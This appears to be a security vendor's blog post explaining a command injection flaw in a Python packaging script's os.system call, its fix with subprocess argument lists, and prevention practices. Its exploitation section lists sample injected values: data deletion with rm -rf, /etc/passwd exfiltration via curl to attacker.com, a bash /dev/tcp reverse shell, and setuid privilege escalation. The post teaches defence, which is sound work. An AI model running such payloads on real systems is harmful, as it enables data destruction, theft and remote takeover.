Command Injection in Python Packaging Scripts: How Shell Metacharacters Can Compromise Your Build Pipeline
Introduction
Build and packaging scripts are often treated as second-class citizens when it comes to security reviews. They live in the packaging/ or scripts/ directory, they run in CI/CD pipelines, and developers tend to assume that only trusted engineers ever interact with them. That assumption can be dangerously wrong.
This post breaks down a high-severity command injection vulnerability found in packaging/checkPackageRuning.py — a script responsible for checking whether a package is running on a server. The vulnerability allowed an attacker who could influence a single variable to execute arbitrary shell commands with the full privileges of the packaging process. We'll explore how it worked, how it was fixed, and what you can do to prevent similar issues in your own codebases.
The Vulnerability Explained
What Is Command Injection?
Command injection is a class of vulnerability where an attacker can cause an application to execute unintended operating system commands. It typically occurs when user-controlled data is passed to a shell interpreter — either directly or indirectly — without proper sanitization.
Think of it like this: if you're building a SQL query by concatenating strings, you risk SQL injection. If you're building a shell command by concatenating strings, you risk command injection. The mechanics are the same; the consequences can be just as severe.
This vulnerability is tracked under CWE-78: Improper Neutralization of Special Elements used in an OS Command and is listed in the OWASP Top 10 under A03:2021 – Injection.
The Vulnerable Code
The root cause was a combination of two dangerous patterns used together:
- String interpolation to build a shell command from a variable (serverHost)
- os.system() to execute that command, which invokes a full shell interpreter
Here's a simplified representation of the vulnerable pattern:
# ❌ VULNERABLE: os.system() with string interpolation
import os
serverHost = get_server_host() # Could be influenced by external input
cmd = "curl http://%s/health-check" % serverHost
os.system(cmd) # Passes the entire string to /bin/sh
The critical detail here is how os.system() works under the hood. On Unix-like systems, os.system(cmd) is essentially equivalent to:
/bin/sh -c "curl http://<serverHost>/health-check"
That means the string is handed to a shell interpreter, and the shell will happily process any metacharacters it finds. Characters like ;, |, &&, `, $(), and > all carry special meaning to the shell.
How Could It Be Exploited?
Imagine serverHost is populated from a configuration file, an environment variable, a command-line argument, or a network response — any source that an attacker might influence. Here's what a malicious value could look like:
# Attacker-controlled serverHost value:
localhost; rm -rf /important/data; echo pwned
When interpolated into the command string:
curl http://localhost; rm -rf /important/data; echo pwned/health-check
The shell treats each semicolon as a command separator and executes all three commands in sequence. The curl command runs first (possibly failing), then rm -rf destroys data, and finally echo prints pwned (with the leftover /health-check suffix attached), confirming execution.
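To see the split without running anything, the sketch below builds the same command string in Python and tokenizes it with the standard library's shlex module. This only approximates how a POSIX shell parses its input, and split_shell_commands is a hypothetical helper written for this illustration (it assumes Python 3.8 or later, where punctuation_chars can be combined with whitespace_split).

```python
import shlex

# Operators that end one command and start another in a POSIX shell.
COMMAND_SEPARATORS = {";", "&&", "||", "|", "&"}


def split_shell_commands(command_line):
    """Roughly split a shell command line into separate commands.

    Hypothetical helper for illustration only: shlex approximates POSIX
    shell tokenization, and nothing here is executed.
    """
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep words like http://localhost intact
    commands, current = [], []
    for token in lexer:
        if token in COMMAND_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Same interpolation as the vulnerable script, with the attacker's value.
server_host = "localhost; rm -rf /important/data; echo pwned"
cmd = "curl http://%s/health-check" % server_host

for argv in split_shell_commands(cmd):
    print(argv)
```

The loop prints three separate argument lists, one each for curl, rm, and echo, which is the shape of what /bin/sh would run.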
Other attack patterns include:
# Exfiltrate sensitive files
localhost && cat /etc/passwd | curl -d @- https://attacker.com/collect
# Establish a reverse shell
localhost; bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Tamper with the package being built
localhost; echo "malicious_code" >> ../src/main.py
# Escalate privileges if the script runs as root in CI
localhost; chmod +s /bin/bash
What's the Real-World Impact?
In the context of a packaging script, the blast radius is particularly large:
- Supply chain compromise: Injected code could modify the package before it's published, affecting every downstream consumer.
- CI/CD pipeline takeover: Build servers often have elevated permissions and access to secrets (API keys, signing certificates, deployment credentials).
- Data exfiltration: Sensitive build artifacts, source code, or environment variables could be sent to an attacker-controlled server.
- Persistence: An attacker could install backdoors in the build environment that persist across runs.
Even if the script is "only run by trusted engineers," consider:
- Compromised developer machines
- Malicious pull requests that modify configuration files read by the script
- Automated pipelines that pull configuration from external sources
The Fix
What Changed
The fix replaces os.system() with Python's subprocess module, called with an argument list so that no shell ever parses the command.
# ✅ FIXED: subprocess with argument list (no shell interpolation)
import subprocess
serverHost = get_server_host()
# Pass arguments as a list — no shell is invoked
result = subprocess.run(
    ["curl", f"http://{serverHost}/health-check"],
    capture_output=True,
    text=True,
    timeout=30
)
Why Does This Fix the Problem?
The key difference is how the arguments are passed to the operating system.
When you use subprocess.run() with a list of arguments (rather than a single string with shell=True), Python launches the program directly. On POSIX systems this is an exec-family call such as execvp(), with no shell in between. This means:
- No shell is invoked: there is no /bin/sh -c wrapper
- Each element in the list is treated as a literal argument: shell metacharacters have no special meaning
- serverHost is passed as a raw string to curl, not interpreted by a shell
Here's a side-by-side comparison to make this concrete:
| Approach | Shell Invoked? | Metacharacters Interpreted? | Safe? |
|---|---|---|---|
| os.system("curl http://" + host) | ✅ Yes | ✅ Yes | ❌ No |
| subprocess.run("curl http://" + host, shell=True) | ✅ Yes | ✅ Yes | ❌ No |
| subprocess.run(["curl", "http://" + host]) | ❌ No | ❌ No | ✅ Yes |
Even if serverHost contains ; rm -rf /, it's passed as a literal string to curl, which will either reject the malformed URL or fail to resolve the hostname. No shell commands are executed.
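A harmless way to check this on your own machine is to swap curl for a child Python process that prints the arguments it receives. In the sketch below, SHOW_ARGS and run_with_list are hypothetical names used only for this demonstration, and the payload uses echo rather than anything destructive.

```python
import subprocess
import sys

# Stand-in for curl: a child Python process that prints the arguments it got.
SHOW_ARGS = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]


def run_with_list(server_host):
    """Run the stand-in program with the URL as a single list element."""
    result = subprocess.run(
        SHOW_ARGS + [f"http://{server_host}/health-check"],
        capture_output=True,
        text=True,
        check=True,
        timeout=30,
    )
    return result.stdout.strip()


# The semicolon arrives inside one argument; no second command is started.
print(run_with_list("localhost; echo pwned"))
```

The child process reports exactly one argument, with the semicolon and the echo text still inside it.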
A Note on shell=True
It's worth emphasizing: subprocess.run() with shell=True is just as dangerous as os.system(). The fix only works because arguments are passed as a list without enabling shell mode.
# ❌ Still vulnerable — shell=True negates the safety of subprocess
subprocess.run("curl http://" + serverHost, shell=True)
# ✅ Safe — list form, no shell
subprocess.run(["curl", "http://" + serverHost])
Prevention & Best Practices
1. Never Use os.system() with Variable Input
Treat os.system() as effectively deprecated for anything beyond the most trivial, hardcoded commands. The Python documentation itself recommends using subprocess instead. Add a linting rule or code review checklist item to flag any use of os.system().
2. Always Prefer Argument Lists in subprocess
Make it a team convention: when using subprocess.run(), subprocess.Popen(), or similar functions, always pass arguments as a list and never set shell=True unless you have a very specific reason and understand the risks.
# Prefer this pattern
subprocess.run(["git", "clone", repo_url], check=True)
# Over this
subprocess.run(f"git clone {repo_url}", shell=True) # ❌
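If a shell is truly unavoidable, for example because the command needs a pipeline, the standard library's shlex.quote() can escape each interpolated value for POSIX shells. The following is a minimal sketch under that assumption. build_health_check_pipeline is a hypothetical helper, and the head -n 1 stage exists only to give the example a reason to need a shell.

```python
import shlex


def build_health_check_pipeline(server_host):
    """Return a POSIX shell command line with the URL safely quoted.

    Hypothetical helper: prefer the list form whenever no shell feature
    (pipes, redirection, globbing) is actually needed.
    """
    url = f"http://{server_host}/health-check"
    # shlex.quote() wraps the value so the shell sees it as one literal word.
    return f"curl -s {shlex.quote(url)} | head -n 1"


command = build_health_check_pipeline("localhost; echo pwned")
# The result is what would be passed to subprocess.run(command, shell=True).
print(command)
```

Quoting is a fallback, not a replacement for the list form: it is easy to forget on one variable, and shlex.quote() is only designed for POSIX-style shells.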
3. Validate and Sanitize Inputs — Even in "Internal" Scripts
Apply input validation to any variable that influences a command, especially if it comes from:
- Command-line arguments (sys.argv, argparse)
- Environment variables (os.environ)
- Configuration files
- Network responses
- Database values
For hostnames specifically, validate against a strict allowlist or use a regex that only permits valid hostname characters:
import re
def validate_hostname(host: str) -> str:
    # Allow only valid hostname characters
    pattern = r'^[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*$'
    # fullmatch() rejects a trailing newline, which match() with $ would accept
    if not re.fullmatch(pattern, host):
        raise ValueError(f"Invalid hostname: {host!r}")
    return host
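The allowlist option mentioned above can be even simpler than a regex when the set of servers is small and known in advance. A minimal sketch, assuming a hypothetical ALLOWED_HOSTS set (the host names are placeholders, not taken from the original script):

```python
# Hypothetical allowlist; replace with the hosts your pipeline really uses.
ALLOWED_HOSTS = frozenset({"localhost", "build01.example.internal"})


def require_allowed_host(host):
    """Return host unchanged if it is on the allowlist, else raise ValueError."""
    # Exact string comparison: no pattern matching, so nothing to bypass.
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"Host not in allowlist: {host!r}")
    return host
```

Calling require_allowed_host() on the value before it reaches any command keeps the check in one place and makes a rejected value fail loudly.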
4. Use Higher-Level Libraries When Possible
For HTTP requests specifically — which is what the curl command was performing — Python has excellent built-in alternatives that bypass the shell entirely:
import urllib.request
import urllib.error
# Use urllib or requests instead of shelling out to curl
try:
    with urllib.request.urlopen(f"http://{serverHost}/health-check", timeout=10) as response:
        status = response.status
except urllib.error.URLError as e:
    print(f"Health check failed: {e}")
This approach is not only more secure but also more portable, more testable, and more Pythonic.
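As one way to make the testability point concrete, the check can be wrapped in a small function whose network call is injectable. This is a sketch rather than the script's actual code: is_healthy and its opener parameter are hypothetical names, and treating any 2xx status as healthy is an assumption.

```python
import http.client
import urllib.request


def is_healthy(server_host, timeout=10.0, opener=urllib.request.urlopen):
    """Return True if the health-check endpoint answers with a 2xx status.

    opener defaults to urllib.request.urlopen and can be replaced with a
    fake in unit tests, so no network access is needed there.
    """
    url = f"http://{server_host}/health-check"
    try:
        with opener(url, timeout=timeout) as response:
            return 200 <= response.status < 300
    # URLError, HTTPError, and socket timeouts are all OSError subclasses;
    # malformed URLs can surface as HTTPException or ValueError.
    except (OSError, http.client.HTTPException, ValueError) as exc:
        print(f"Health check failed: {exc}")
        return False
```

A test can pass a stub opener that returns an object with a status attribute, which is much harder to arrange when the check shells out to curl.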
5. Apply the Principle of Least Privilege
Packaging and build scripts should run with the minimum permissions necessary. Even if a command injection vulnerability exists, limiting the process's privileges reduces the blast radius significantly:
- Don't run build scripts as root
- Use dedicated service accounts with scoped permissions
- Restrict network egress from build environments
- Use read-only mounts for source code where possible
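The first item can also be enforced from inside the script. The guard below is a minimal sketch: ensure_not_root is a hypothetical function, not part of the original script, and it only covers the root check, not the other items in the list.

```python
import os


def ensure_not_root(effective_uid=None):
    """Raise PermissionError if the process is running as root (UID 0).

    Hypothetical guard for illustration; effective_uid can be passed in
    explicitly for testing. On platforms without os.geteuid (for example
    Windows) the check is skipped.
    """
    if effective_uid is None:
        geteuid = getattr(os, "geteuid", None)
        if geteuid is None:
            return
        effective_uid = geteuid()
    if effective_uid == 0:
        raise PermissionError("Refusing to run the packaging script as root")
```

Calling ensure_not_root() at the top of a packaging script turns an accidental root run into an immediate, visible failure.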
6. Static Analysis and Automated Scanning
Several tools can detect command injection patterns automatically:
- Bandit (bandit -r .): A Python-specific security linter that flags os.system() calls and subprocess with shell=True
- Semgrep: Highly configurable static analysis with rules for injection vulnerabilities
- CodeQL: GitHub's semantic code analysis engine, excellent for data-flow analysis
- OrbisAI Security: AI-powered security scanning (which detected this exact vulnerability)
Integrate these tools into your CI/CD pipeline so vulnerabilities are caught before they reach production.
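To give a feel for what such a rule looks for, here is a deliberately tiny checker built on Python's ast module. It is not how Bandit, Semgrep, or CodeQL are implemented, and find_risky_calls is a hypothetical name. It only recognizes the two literal patterns discussed in this post and would miss aliased imports or values computed at runtime.

```python
import ast


def find_risky_calls(source):
    """Return sorted (line, reason) pairs for os.system() and shell=True calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Pattern 1: a call written literally as os.system(...)
        if (
            isinstance(func, ast.Attribute)
            and func.attr == "system"
            and isinstance(func.value, ast.Name)
            and func.value.id == "os"
        ):
            findings.append((node.lineno, "os.system() call"))
        # Pattern 2: any call that passes the keyword shell=True
        for keyword in node.keywords:
            if (
                keyword.arg == "shell"
                and isinstance(keyword.value, ast.Constant)
                and keyword.value.value is True
            ):
                findings.append((node.lineno, "shell=True"))
    return sorted(findings)


sample = (
    "import os, subprocess\n"
    "os.system('curl http://' + host)\n"
    "subprocess.run(cmd, shell=True)\n"
    "subprocess.run(['curl', url])\n"
)
for line, reason in find_risky_calls(sample):
    print(f"line {line}: {reason}")
```

The real tools add data-flow tracking and far broader rule sets, which is why they belong in the pipeline rather than a homegrown script like this one.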
7. Security Standards and References
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- OWASP A03:2021: Injection
- Python Security Docs: subprocess — Subprocess management
- NIST NVD: Search for CVEs tagged with command injection to see real-world examples
Conclusion
This vulnerability is a textbook example of how a single unsafe function call — os.system() with string interpolation — can open the door to complete system compromise. What makes it particularly insidious is that the code works perfectly under normal conditions; the danger only manifests when input is malicious.
The key takeaways from this fix:
- os.system() is dangerous when used with any variable input; treat it as a code smell
- subprocess with argument lists eliminates the shell injection surface by bypassing the shell entirely
- Build and packaging scripts deserve the same security scrutiny as production application code, and sometimes more, given their elevated privileges and access to signing keys and secrets
- Automated security scanning can catch these patterns before they become incidents
- Defense in depth — validation, least privilege, and monitoring all add layers of protection
Secure coding isn't just about protecting your users; it's about protecting your build pipeline, your infrastructure, and your supply chain. Every script counts.
This vulnerability was detected and patched using automated security scanning. If you'd like to learn more about securing your development pipeline, check out OrbisAI Security.